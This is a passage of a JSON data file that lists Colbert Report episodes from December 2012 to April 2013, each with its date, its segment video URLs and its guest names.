        "http://thecolbertreport.cc.com/videos/yr83zl/ground-zero-mosque-erade",
        "http://thecolbertreport.cc.com/videos/38iv8s/mandy-patinkin"
      ],
      "guest": "Mandy Patinkin, Michael Stipe"
    },
    {
      "date": "2012-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ao4d2q/hurricane-sandy-mega-concert",
        "http://thecolbertreport.cc.com/videos/dseos2/uncensored----breaking-abbey-",
        "http://thecolbertreport.cc.com/videos/clpvpj/colbert-super-pac---the-ham-rove-memorial-fund",
        "http://thecolbertreport.cc.com/videos/wozbhp/simone-campbell"
      ],
      "guest": "Sister Simone Campbell, Jeff Tweedy, Mavis Staples, Sean Lennon"
    }
  ],
  "2013": [
    {
      "date": "2013-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgkrwx/intro---1-7-13",
        "http://thecolbertreport.cc.com/videos/83h5da/stephen-s-holiday-break",
        "http://thecolbertreport.cc.com/videos/9nmhtf/fiscal-cliff-deal---disincentives",
        "http://thecolbertreport.cc.com/videos/wq7dip/the-platinum-debt-ceiling-solution",
        "http://thecolbertreport.cc.com/videos/b1uvtc/blood-in-the-water---bill-o-reilly-s-racial-insensitivity",
        "http://thecolbertreport.cc.com/videos/ayoamg/jimmy-wales",
        "http://thecolbertreport.cc.com/videos/a1dzb3/sign-off---goodnight"
      ],
      "guest": "Jimmy Wales"
    },
    {
      "date": "2013-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fuxwr9/intro---1-8-13",
        "http://thecolbertreport.cc.com/videos/gdcdgs/postage-price-hike",
        "http://thecolbertreport.cc.com/videos/vcqeg7/cheating-death---rage---blood-transfusions",
        "http://thecolbertreport.cc.com/videos/ps8djx/bin-laden-film-controversy",
        "http://thecolbertreport.cc.com/videos/kq9pp2/chris-kluwe",
        "http://thecolbertreport.cc.com/videos/gcv2eh/sign-off---vacsa-tern"
      ],
      "guest": "Chris Kluwe"
    },
    {
      "date": "2013-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kg1znk/intro---1-9-13",
        "http://thecolbertreport.cc.com/videos/ip7ql9/idaho-s-walled---armed-community",
        "http://thecolbertreport.cc.com/videos/tzcfhr/gun-control-backlash",
        "http://thecolbertreport.cc.com/videos/52uula/thought-for-food---wheat-addictions",
        "http://thecolbertreport.cc.com/videos/ysa6lr/neil-shubin",
        "http://thecolbertreport.cc.com/videos/5majke/sign-off---mcgnaw-the-gluten-free-beaver"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2013-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uej3ac/roadside-sofa-boning",
        "http://thecolbertreport.cc.com/videos/5n5w35/obama-s-failed-second-term",
        "http://thecolbertreport.cc.com/videos/35sqrd/tip-wag---hapifork---kevin-garnett",
        "http://thecolbertreport.cc.com/videos/ro7hjf/benjamin-gibbard"
      ],
      "guest": "Ben Gibbard"
    },
    {
      "date": "2013-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y2ynrh/stephen-colbert-s-double-barrel-blam-o-rama---silver-bullets---video-games",
        "http://thecolbertreport.cc.com/videos/8zsm19/stephen-colbert-s-double-barrel-blam-o-rama---piers-morgan---james-yeager",
        "http://thecolbertreport.cc.com/videos/zftq7q/stephen-colbert-s-double-barrel-blam-o-rama---guns-as-civil-rights-victims",
        "http://thecolbertreport.cc.com/videos/4lcqtx/vitaminwater-advertising-lawsuit",
        "http://thecolbertreport.cc.com/videos/bainem/piers-morgan",
        "http://thecolbertreport.cc.com/videos/hoc2kn/sign-off---pocketbook-constitution"
      ],
      "guest": "Piers Morgan"
    },
    {
      "date": "2013-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t6cye7/intro---1-15-13",
        "http://thecolbertreport.cc.com/videos/p5ll7c/lance-armstrong-s-interview-with-oprah",
        "http://thecolbertreport.cc.com/videos/uuduw3/monkey-on-the-lam---macaque-attack---1-381-days-of-simian-terror-in-tampa",
        "http://thecolbertreport.cc.com/videos/r78s3t/catacoffin-catacombo-sound-system",
        "http://thecolbertreport.cc.com/videos/an9lge/jared-diamond",
        "http://thecolbertreport.cc.com/videos/usj2pz/sign-off---goodnight"
      ],
      "guest": "Jared Diamond"
    },
    {
      "date": "2013-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j56lbb/intro---1-16-13",
        "http://thecolbertreport.cc.com/videos/s9aj13/healthy-fake-smiles",
        "http://thecolbertreport.cc.com/videos/uhkynp/hsbc-laundering-charges",
        "http://thecolbertreport.cc.com/videos/hbxrk6/hsbc-laundering-charges---matt-taibbi",
        "http://thecolbertreport.cc.com/videos/62nu7n/pat-robertson-s-romance-advice",
        "http://thecolbertreport.cc.com/videos/m7jh2f/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/ib0ftp/sign-off---goodnight"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2013-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r3kb1q/exclusive---colbert-wax-on---wax-off-at-madame-tussauds--outtakes",
        "http://thecolbertreport.cc.com/videos/qqx0s8/corporate-scamwich",
        "http://thecolbertreport.cc.com/videos/df7rup/obama-s-gun-grab",
        "http://thecolbertreport.cc.com/videos/w73nzv/the-word---united-we-standoff",
        "http://thecolbertreport.cc.com/videos/g1jrq5/porn-names---porn-lawsuits",
        "http://thecolbertreport.cc.com/videos/vem33s/akhil-reed-amar",
        "http://thecolbertreport.cc.com/videos/jawwj8/sign-off---goodnight"
      ],
      "guest": "Akhil Reed Amar"
    },
    {
      "date": "2013-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zzot6e/intro---1-21-13",
        "http://thecolbertreport.cc.com/videos/xjexam/obama-s-second-inauguration",
        "http://thecolbertreport.cc.com/videos/li25sm/stephen-s-re-inauguration",
        "http://thecolbertreport.cc.com/videos/djvjxw/threatdown---flu--kate-middleton--vomiting-robots--superintelligent-gonorrhea--bears",
        "http://thecolbertreport.cc.com/videos/o7bw1e/ta-nehisi-coates",
        "http://thecolbertreport.cc.com/videos/9hwods/sign-off---hotel-bibles"
      ],
      "guest": "Ta-Nehisi Coates"
    },
    {
      "date": "2013-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u2sxvp/exclusive---kathryn-bigelow-extended-interview",
        "http://thecolbertreport.cc.com/videos/4h7ltu/obama-s-inauguration---class-warfare",
        "http://thecolbertreport.cc.com/videos/0f673t/the-word---win--lose--or-redraw",
        "http://thecolbertreport.cc.com/videos/tccphp/dustin-hoffman-s-bad-news",
        "http://thecolbertreport.cc.com/videos/rn0fho/kathryn-bigelow",
        "http://thecolbertreport.cc.com/videos/msaso2/sign-off----zero-dark-thirty-----quartet-"
      ],
      "guest": "Kathryn Bigelow"
    },
    {
      "date": "2013-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3reklz/beyonce-s-lip-gate",
        "http://thecolbertreport.cc.com/videos/vw3zie/tip-wag---montpelier-school-district--theatlasphere-com---florida-officials",
        "http://thecolbertreport.cc.com/videos/f3o0qj/alpha-dog-of-the-week---virginia-state-senate-republicans",
        "http://thecolbertreport.cc.com/videos/202a1c/sally-field",
        "http://thecolbertreport.cc.com/videos/hd80sm/sign-off---goodnight"
      ],
      "guest": "Sally Field"
    },
    {
      "date": "2013-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xaaxud/france---the-mali-conflict",
        "http://thecolbertreport.cc.com/videos/i1sdq5/france---the-mali-conflict---edward-berenson",
        "http://thecolbertreport.cc.com/videos/vgqq4z/benghazi-attack-hearing",
        "http://thecolbertreport.cc.com/videos/ktiaje/tavi-gevinson",
        "http://thecolbertreport.cc.com/videos/scixor/sign-off---stephen-s-makeover"
      ],
      "guest": "Tavi Gevinson"
    },
    {
      "date": "2013-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q1iuxz/intro---1-28-13",
        "http://thecolbertreport.cc.com/videos/27at9z/rapiscan-scanners",
        "http://thecolbertreport.cc.com/videos/mm5bdz/the-word---the-new-abnormal",
        "http://thecolbertreport.cc.com/videos/0q31iw/the-axis-of-evil-of-the-week---north-korea",
        "http://thecolbertreport.cc.com/videos/qdf7ec/michael-shellenberger",
        "http://thecolbertreport.cc.com/videos/tquuvs/sign-off---goodnight"
      ],
      "guest": "Michael Shellenberger"
    },
    {
      "date": "2013-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ax2hi/intro---1-29-13",
        "http://thecolbertreport.cc.com/videos/81oaln/iran-s-space-monkey---america-s-ape-moratorium",
        "http://thecolbertreport.cc.com/videos/k95k9v/gun-control---state-sovereignty",
        "http://thecolbertreport.cc.com/videos/7c8y4f/gun-control---state-sovereignty---cliff-sloan",
        "http://thecolbertreport.cc.com/videos/gfoq4g/guantanamo-bay-office-closure",
        "http://thecolbertreport.cc.com/videos/jtkgrc/george-saunders",
        "http://thecolbertreport.cc.com/videos/jzuerq/sign-off----tenth-of-december-"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2013-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/omljip/intro---1-30-13",
        "http://thecolbertreport.cc.com/videos/drdd3e/coming-out-benefits---gay-rights",
        "http://thecolbertreport.cc.com/videos/qnfsur/the-word---it-gets-worse",
        "http://thecolbertreport.cc.com/videos/i6hr57/non-racist-kkk",
        "http://thecolbertreport.cc.com/videos/kiwt0s/bill-gates",
        "http://thecolbertreport.cc.com/videos/4wroqd/sign-off---goodnight"
      ],
      "guest": "Bill Gates"
    },
    {
      "date": "2013-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/101faw/sport-report---ads-for-ads---deer-antler-spray",
        "http://thecolbertreport.cc.com/videos/odn1pg/sport-report---gatorade-chemicals---chicken-wing-shortage",
        "http://thecolbertreport.cc.com/videos/7wymxs/craziest-f--king-thing-i-ve-ever-heard---crows-using-tools",
        "http://thecolbertreport.cc.com/videos/v42kz3/matthew-guerrieri",
        "http://thecolbertreport.cc.com/videos/o489no/sign-off---welcome-baby-sanchez-"
      ],
      "guest": "Matthew Guerrieri"
    },
    {
      "date": "2013-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iyrevo/intro---2-4-13",
        "http://thecolbertreport.cc.com/videos/kb76z3/super-bowl-xlvii",
        "http://thecolbertreport.cc.com/videos/vow0uy/bipartisan-immigration-reform",
        "http://thecolbertreport.cc.com/videos/ur7z4s/skeet-shooting-skeptics",
        "http://thecolbertreport.cc.com/videos/qxsatq/sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/cmttl3/sign-off---second-amendment"
      ],
      "guest": "Justice Sonia Sotomayor"
    },
    {
      "date": "2013-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2316uc/intro---2-5-13",
        "http://thecolbertreport.cc.com/videos/e96s3c/royal-remains",
        "http://thecolbertreport.cc.com/videos/t6wn9f/tip-wag---drunk-donating----the-job--reality-show",
        "http://thecolbertreport.cc.com/videos/a1z0cu/california-s-heroic-hitchhiker",
        "http://thecolbertreport.cc.com/videos/dyxduh/julie-andrews",
        "http://thecolbertreport.cc.com/videos/y7gdjs/sign-off---final-rose"
      ],
      "guest": "Julie Andrews"
    },
    {
      "date": "2013-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ae7fmq/intro---2-6-13",
        "http://thecolbertreport.cc.com/videos/33sahu/the-penny-pinch",
        "http://thecolbertreport.cc.com/videos/r6xbr9/stephen-s-sister-for-congress",
        "http://thecolbertreport.cc.com/videos/07240r/scientology-church-violence",
        "http://thecolbertreport.cc.com/videos/acokbc/lawrence-wright",
        "http://thecolbertreport.cc.com/videos/kt2abh/sign-off---watermelon-warning"
      ],
      "guest": "Lawrence Wright"
    },
    {
      "date": "2013-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/14j8d1/intro---2-7-13",
        "http://thecolbertreport.cc.com/videos/k4xzoo/winter-storm-nemo",
        "http://thecolbertreport.cc.com/videos/xknwhm/mr--smith-goes-to-the-state-legislature---stacey-campfield",
        "http://thecolbertreport.cc.com/videos/044mxj/-bang-with-friends--app",
        "http://thecolbertreport.cc.com/videos/eqsq39/benh-zeitlin",
        "http://thecolbertreport.cc.com/videos/xarh0o/sign-off---goodnight"
      ],
      "guest": "Behn Zeitlin"
    },
    {
      "date": "2013-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xstxbo/bush-family-email-hack",
        "http://thecolbertreport.cc.com/videos/s7p70k/pope-s-resignation---papal-speculatron-7500",
        "http://thecolbertreport.cc.com/videos/v1p2wr/pope-s-resignation---papal-speculatron-7500---james-martin",
        "http://thecolbertreport.cc.com/videos/he6l0j/garry-wills",
        "http://thecolbertreport.cc.com/videos/38op41/sign-off----why-priests--"
      ],
      "guest": "Garry Wills"
    },
    {
      "date": "2013-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hbhjqi/intro---2-12-13",
        "http://thecolbertreport.cc.com/videos/hwigu9/rnc-autopsy",
        "http://thecolbertreport.cc.com/videos/6t4bfw/conservative-victory-project",
        "http://thecolbertreport.cc.com/videos/b91wqa/arizona-s-gun-posse",
        "http://thecolbertreport.cc.com/videos/87jshg/roger-hodge",
        "http://thecolbertreport.cc.com/videos/4j42vn/sign-off---goodnight"
      ],
      "guest": "Roger Hodge"
    },
    {
      "date": "2013-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r8y2v4/obama-s-state-of-the-union",
        "http://thecolbertreport.cc.com/videos/7g4eal/state-of-the-rubio",
        "http://thecolbertreport.cc.com/videos/89tt3v/spanish-state-of-the-rubio",
        "http://thecolbertreport.cc.com/videos/wrywsk/dave-grohl",
        "http://thecolbertreport.cc.com/videos/rsui4q/sign-off---dry-mouth"
      ],
      "guest": "Dave Grohl"
    },
    {
      "date": "2013-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8k6qf1/st--valentine-s-day",
        "http://thecolbertreport.cc.com/videos/bg5se9/standard---poor-s-ratings-lawsuit",
        "http://thecolbertreport.cc.com/videos/a7o9iy/standard---poor-s-ratings-lawsuit---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/gha2xx/nailed--em---richard-eggers",
        "http://thecolbertreport.cc.com/videos/jipac1/gavin-newsom",
        "http://thecolbertreport.cc.com/videos/tl6blx/sign-off----here-s-the-deal-"
      ],
      "guest": "Gavin Newsom"
    },
    {
      "date": "2013-02-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mk66vx/russian-meteor-strike",
        "http://thecolbertreport.cc.com/videos/18bt84/colbert-platinum---huayra-sports-car--phil-mickelson---belle-isle",
        "http://thecolbertreport.cc.com/videos/nzi8fo/obama-s-secretive-golf-outing",
        "http://thecolbertreport.cc.com/videos/qsppoj/emily-bazelon",
        "http://thecolbertreport.cc.com/videos/rivg1z/sign-off---goodnight"
      ],
      "guest": "Emily Bazelon"
    },
    {
      "date": "2013-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tq706t/u-k--horse-meat-scandal",
        "http://thecolbertreport.cc.com/videos/76hws3/sport-report---international-soccer-corruption",
        "http://thecolbertreport.cc.com/videos/t95tyj/sport-report---international-soccer-corruption---alexi-lalas",
        "http://thecolbertreport.cc.com/videos/oy70q1/norway-s--national-firewood-night-",
        "http://thecolbertreport.cc.com/videos/d68kfy/david-goldhill",
        "http://thecolbertreport.cc.com/videos/4869v6/sign-off---goodnight"
      ],
      "guest": "David Goldhill"
    },
    {
      "date": "2013-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5dzdoq/-friends-of-hamas--rumor",
        "http://thecolbertreport.cc.com/videos/0x6brn/geo-group-stadium",
        "http://thecolbertreport.cc.com/videos/yhhjej/corporate-twitter-hacks",
        "http://thecolbertreport.cc.com/videos/ef8eii/lil-buck"
      ],
      "guest": "Lil Buck"
    },
    {
      "date": "2013-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dysmy8/intro---2-25-13",
        "http://thecolbertreport.cc.com/videos/n5lz93/the-word---silent-but-deadly",
        "http://thecolbertreport.cc.com/videos/ub1skg/popewatch-2013---vatican-sex-parties",
        "http://thecolbertreport.cc.com/videos/ovpx97/simon-garfield",
        "http://thecolbertreport.cc.com/videos/7ucjsc/sign-off---goodnight"
      ],
      "guest": "Simon Garfield"
    },
    {
      "date": "2013-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8vjzyf/intro---2-26-13",
        "http://thecolbertreport.cc.com/videos/gy9em4/popewatch-indeschism-2013---one-pope-over-the-line",
        "http://thecolbertreport.cc.com/videos/f5k4cb/battleground-texas---jeremy-bird",
        "http://thecolbertreport.cc.com/videos/xdriyp/drone-ducking-tips",
        "http://thecolbertreport.cc.com/videos/wr3lk3/michio-kaku",
        "http://thecolbertreport.cc.com/videos/i7sahj/sign-off---goodnight"
      ],
      "guest": "Dr. Michio Kaku"
    },
    {
      "date": "2013-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6637zm/intro---2-27-13",
        "http://thecolbertreport.cc.com/videos/8okga0/halls-mentho-lyptus-cough-drops",
        "http://thecolbertreport.cc.com/videos/9mtjmn/khalid-sheikh-mohammed-s-trial-at-gitmo",
        "http://thecolbertreport.cc.com/videos/9mvj8u/khalid-sheikh-mohammed-s-trial-at-gitmo---neal-katyal",
        "http://thecolbertreport.cc.com/videos/r7gapm/john-kerry-s-dumb-talk",
        "http://thecolbertreport.cc.com/videos/cxjhmj/paola-antonelli",
        "http://thecolbertreport.cc.com/videos/7trotu/sign-off---halls-mentho-lyptus"
      ],
      "guest": "Paola Antonelli"
    },
    {
      "date": "2013-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hmyuom/intro---2-28-13",
        "http://thecolbertreport.cc.com/videos/1epo24/colbert-report-consumer-alert---demonic-goodwill-items",
        "http://thecolbertreport.cc.com/videos/d7le3o/pope-tbd---souvenir-sales",
        "http://thecolbertreport.cc.com/videos/tnbuj0/budget-sequestration",
        "http://thecolbertreport.cc.com/videos/66dbox/jon-favreau",
        "http://thecolbertreport.cc.com/videos/o5hoan/sign-off---goodnight"
      ],
      "guest": "Obama speechwriter Jon Favreau"
    },
    {
      "date": "2013-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ouzof3/sequestration---obama-s-sci-fi-flub",
        "http://thecolbertreport.cc.com/videos/xlk2nw/the-enemy-within---dr--skylar-bayer",
        "http://thecolbertreport.cc.com/videos/4v9opj/texas-gun-training-bill---free-shotgun-experiment",
        "http://thecolbertreport.cc.com/videos/ala255/kirk-bloodsworth",
        "http://thecolbertreport.cc.com/videos/7xfdsz/sign-off---goodnight"
      ],
      "guest": "Kirk Bloodsworth"
    },
    {
      "date": "2013-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/johtnl/intro---3-5-13",
        "http://thecolbertreport.cc.com/videos/d8ua02/hugo-chavez---jon-stewart-announcements",
        "http://thecolbertreport.cc.com/videos/yesa8j/obama-s-israel-trip",
        "http://thecolbertreport.cc.com/videos/xeotb9/obama-s-israel-trip---michael-oren",
        "http://thecolbertreport.cc.com/videos/r5gahs/dennis-tito-s-mars-flyby-mission",
        "http://thecolbertreport.cc.com/videos/23396i/james-franco",
        "http://thecolbertreport.cc.com/videos/ki0n4m/sign-off---goodnight"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2013-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5pvbru/-snowquester-",
        "http://thecolbertreport.cc.com/videos/2ox5xp/voting-rights-act",
        "http://thecolbertreport.cc.com/videos/5yipjs/voting-rights-act---julian-bond",
        "http://thecolbertreport.cc.com/videos/3ddous/thought-for-food---bloomberg---the-nacho-bliss-point",
        "http://thecolbertreport.cc.com/videos/25fidf/brendan-o-connell",
        "http://thecolbertreport.cc.com/videos/76de2t/sign-off---tostitos-scoops"
      ],
      "guest": "Brendan O'Connell"
    },
    {
      "date": "2013-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7nblia/rand-paul-s-filibuster",
        "http://thecolbertreport.cc.com/videos/aq09bw/north-korea-s-armistice-breach----we-are-the-world--propaganda-video",
        "http://thecolbertreport.cc.com/videos/rz6ppl/the-bachelor",
        "http://thecolbertreport.cc.com/videos/uldxcb/john-sexton",
        "http://thecolbertreport.cc.com/videos/mhruf7/sign-off---land-of-romance"
      ],
      "guest": "John Sexton"
    },
    {
      "date": "2013-03-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6zcxhr/election-of-pope-francis",
        "http://thecolbertreport.cc.com/videos/t23n7e/history-channel-s--the-bible-",
        "http://thecolbertreport.cc.com/videos/7cya4y/colbert-super-pac---ham-rove-memorial-conference-room",
        "http://thecolbertreport.cc.com/videos/bwz16t/junot-diaz",
        "http://thecolbertreport.cc.com/videos/vwhyh8/sign-off----the-bible-"
      ],
      "guest": "Junot Diaz"
    },
    {
      "date": "2013-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ftxoqq/gop-growth---opportunity-project",
        "http://thecolbertreport.cc.com/videos/k5798h/the-word---narcicitizenship",
        "http://thecolbertreport.cc.com/videos/rj8f1x/stephen-colbert-is-watching-your-kids---whale-bone-porn",
        "http://thecolbertreport.cc.com/videos/udr4lu/eric-topol",
        "http://thecolbertreport.cc.com/videos/755nas/sign-off---medical-smartphone"
      ],
      "guest": "Dr. Eric Topol"
    },
    {
      "date": "2013-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lapsll/intro---3-27-13",
        "http://thecolbertreport.cc.com/videos/8f2crl/bill-o-reilly-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/jk0icd/facebook--like--button-science",
        "http://thecolbertreport.cc.com/videos/gd7ki7/sharia-mops",
        "http://thecolbertreport.cc.com/videos/0i05bg/carl-edgar-blake-ii",
        "http://thecolbertreport.cc.com/videos/8g5b2m/sign-off---hamlet"
      ],
      "guest": "Carl Edgar Blake II"
    },
    {
      "date": "2013-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mmwqg6/supreme-court-hearings-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/o26xyc/supreme-court-hearings-on-gay-marriage---emily-bazelon-pt--1",
        "http://thecolbertreport.cc.com/videos/qbupod/supreme-court-hearings-on-gay-marriage---emily-bazelon-pt--2",
        "http://thecolbertreport.cc.com/videos/sliefv/robert-lustig",
        "http://thecolbertreport.cc.com/videos/qlgxw8/sign-off---goodnight"
      ],
      "guest": "Dr. Robert Lustig"
    },
    {
      "date": "2013-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j7yyx1/intro---4-1-13",
        "http://thecolbertreport.cc.com/videos/mbhysf/easter-under-attack---pope-edition",
        "http://thecolbertreport.cc.com/videos/egcbz2/health-care-lottery",
        "http://thecolbertreport.cc.com/videos/g3wft7/utah-s-earth-day-celebration",
        "http://thecolbertreport.cc.com/videos/rmu5w0/sigourney-weaver",
        "http://thecolbertreport.cc.com/videos/lt4lab/sign-off---welcome-baby-nurick-"
      ],
      "guest": "Sigourney Weaver"
    },
    {
      "date": "2013-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dgrhqs/gay-marriage-fraud",
        "http://thecolbertreport.cc.com/videos/sq7yjh/we-are-at-war---north-korea",
        "http://thecolbertreport.cc.com/videos/0pozxj/we-are-at-war---north-korea---victor-cha",
        "http://thecolbertreport.cc.com/videos/w7owfy/florida-s-bong-bill",
        "http://thecolbertreport.cc.com/videos/7qy183/jim-mcgreevey",
        "http://thecolbertreport.cc.com/videos/1qietk/sign-off---goodnight"
      ],
      "guest": "Jim McGreevey"
    },
    {
      "date": "2013-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ci6sy/-morning-joe--vs--the-colbert-report",
        "http://thecolbertreport.cc.com/videos/54w6pz/gun-control---barn-orgies",
        "http://thecolbertreport.cc.com/videos/heku72/rnc-young-voters-survey",
        "http://thecolbertreport.cc.com/videos/tnl1m7/a-c--grayling",
        "http://thecolbertreport.cc.com/videos/kfs88u/sign-off---campaign-poster"
      ],
      "guest": "A.C. Grayling"
    },
    {
      "date": "2013-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6sjovw/intro---4-4-13",
        "http://thecolbertreport.cc.com/videos/2h8ym1/pegasus-pipeline-spill",
        "http://thecolbertreport.cc.com/videos/0tmqs0/koko---jeremy-irons-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/97bihb/obama-s-brain-initiative",
        "http://thecolbertreport.cc.com/videos/wb31l0/francis-collins",
        "http://thecolbertreport.cc.com/videos/jpb3iv/sign-off---eeg-cap"
      ],
      "guest": "Dr. Francis Collins"
    },
    {
      "date": "2013-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2htlq3/colbert-galactic-initiative",
        "http://thecolbertreport.cc.com/videos/z4m9xu/colbert-galactic-initiative---bill-clinton-pt--1",
        "http://thecolbertreport.cc.com/videos/y3hr34/colbert-galactic-initiative---bill-clinton-pt--2",
        "http://thecolbertreport.cc.com/videos/hmills/colbert-galactic-initiative---bill-clinton-pt--3",
        "http://thecolbertreport.cc.com/videos/jmsckt/sign-off---colbert-galactic-initiative"
      ],
      "guest": "Bill Clinton"
    },
    {
      "date": "2013-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dzx936/intro---4-9-13",
        "http://thecolbertreport.cc.com/videos/9a1zbe/prez-billy-jeff-clinton",
        "http://thecolbertreport.cc.com/videos/k04x7j/clinton-global-initiative-university-exchange-fair",
        "http://thecolbertreport.cc.com/videos/yq6m6x/exxon-s-disaster-relief",
        "http://thecolbertreport.cc.com/videos/qa420d/charlie-leduff",
        "http://thecolbertreport.cc.com/videos/jti3ea/sign-off---potato-clock"
      ],
      "guest": "Charlie LeDuff"
    },
    {
      "date": "2013-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4g4o0/navy-laser-technology",
        "http://thecolbertreport.cc.com/videos/b0yf3a/tip-wag---gun-edition---united-nations--senate-republicans---video-games",
        "http://thecolbertreport.cc.com/videos/xr32ry/anthony-weiner-s-comeback",
        "http://thecolbertreport.cc.com/videos/mvszff/shane-smith",
        "http://thecolbertreport.cc.com/videos/fhj67z/sign-off---laser-tag"
      ],
      "guest": "Shane Smith"
    },
    {
      "date": "2013-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ycrshs/nasa-lasso",
        "http://thecolbertreport.cc.com/videos/2ixasd/america-s-pot-astrophe",
        "http://thecolbertreport.cc.com/videos/t10bgi/america-s-pot-astrophe---nick-gillespie",
        "http://thecolbertreport.cc.com/videos/82a7wi/times-square-mascots-ban",
        "http://thecolbertreport.cc.com/videos/oiajpp/cass-sunstein",
        "http://thecolbertreport.cc.com/videos/5r04eq/sign-off---goodnight"
      ],
      "guest": "Cass Sunstein"
    },
    {
      "date": "2013-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ifpmy1/intro---4-16-13",
        "http://thecolbertreport.cc.com/videos/s94ied/tip-wag---brood-ii-cicadas--sexcereal---gop-internet-memes",
        "http://thecolbertreport.cc.com/videos/h77c6i/rollie-eggmaster",
        "http://thecolbertreport.cc.com/videos/c5i1jr/caroline-kennedy",
        "http://thecolbertreport.cc.com/videos/yygt35/sign-off---goodnight"
      ],
      "guest": "Caroline Kennedy"
    },
    {
      "date": "2013-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yfwqpo/ricin-letters---boston-bombing-suspects",
        "http://thecolbertreport.cc.com/videos/b1ekda/bitcoin-plunge",
        "http://thecolbertreport.cc.com/videos/rxy9ze/bitcoin-plunge---adam-davidson",
        "http://thecolbertreport.cc.com/videos/2sml1x/-accidental-racist--song",
        "http://thecolbertreport.cc.com/videos/n7jblw/alan-cumming",
        "http://thecolbertreport.cc.com/videos/4y7jmv/sign-off---goodnight"
      ],
      "guest": "Alan Cumming"
    },
    {
      "date": "2013-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jr70gq/boston-marathon--bag-men-",
        "http://thecolbertreport.cc.com/videos/de4kxw/the-bucket-maiden-voyage",
        "http://thecolbertreport.cc.com/videos/x7fhfp/gun-control-block",
        "http://thecolbertreport.cc.com/videos/tvksjy/richard-engel",
        "http://thecolbertreport.cc.com/videos/17gkl6/sign-off---the-bucket"
      ],
      "guest": "Richard Engel"
    },
    {
      "date": "2013-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nc9lav/intro---4-22-13",
        "http://thecolbertreport.cc.com/videos/vlo1dt/boston-bombers",
        "http://thecolbertreport.cc.com/videos/pd1fay/toronto-terror-plot",
        "http://thecolbertreport.cc.com/videos/06tavh/tiny-triumphs---infrastructure---river-pollution",
        "http://thecolbertreport.cc.com/videos/hkxcsa/george-w--bush-presidential-library",
        "http://thecolbertreport.cc.com/videos/d8p3y1/michael-pollan",
        "http://thecolbertreport.cc.com/videos/34u7cu/sign-off---goodnight"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2013-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12jjaw/scoobygate",
        "http://thecolbertreport.cc.com/videos/dcyvro/austerity-s-spreadsheet-error",
        "http://thecolbertreport.cc.com/videos/kbgnf0/austerity-s-spreadsheet-error---thomas-herndon",
        "http://thecolbertreport.cc.com/videos/54pqtc/eric-schmidt",
        "http://thecolbertreport.cc.com/videos/uwzpai/sign-off---goodnight"
      ],
      "guest": "Eric Schmidt"
    },
    {
      "date": "2013-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kwa0vp/ap-twitter-hack",
        "http://thecolbertreport.cc.com/videos/tk4his/bill-clinton-s-twitter-lessons",
        "http://thecolbertreport.cc.com/videos/r1hl69/tiny-triumphs---nasa-s-giant-penis-doodle",
